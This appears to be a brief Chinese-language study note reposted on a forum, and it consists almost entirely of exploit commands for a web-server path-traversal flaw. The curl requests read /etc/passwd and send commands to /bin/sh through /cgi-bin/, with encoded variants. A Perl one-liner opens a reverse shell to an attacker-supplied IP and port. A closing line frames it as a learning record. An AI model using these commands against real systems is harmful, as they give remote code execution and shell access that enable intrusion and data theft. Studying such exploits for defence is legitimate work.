curl -v --path-as-is 'http://xx.xx.xx.xx/icons/../../../../etc/passwd'
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
curl --data "echo;id" 'http://xx.xx.xx.xx/cgi-bin/../../../../bin/sh'
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh反弹shell,使用perl语言生成的反弹shell命令
echo;perl -e 'use Socket;$i="IP地址";$p=端口;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'以上内容仅作学习记录,如有错误或瑕疵,欢迎批评指正,感谢阅读。
欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) | Powered by Discuz! X3.4 |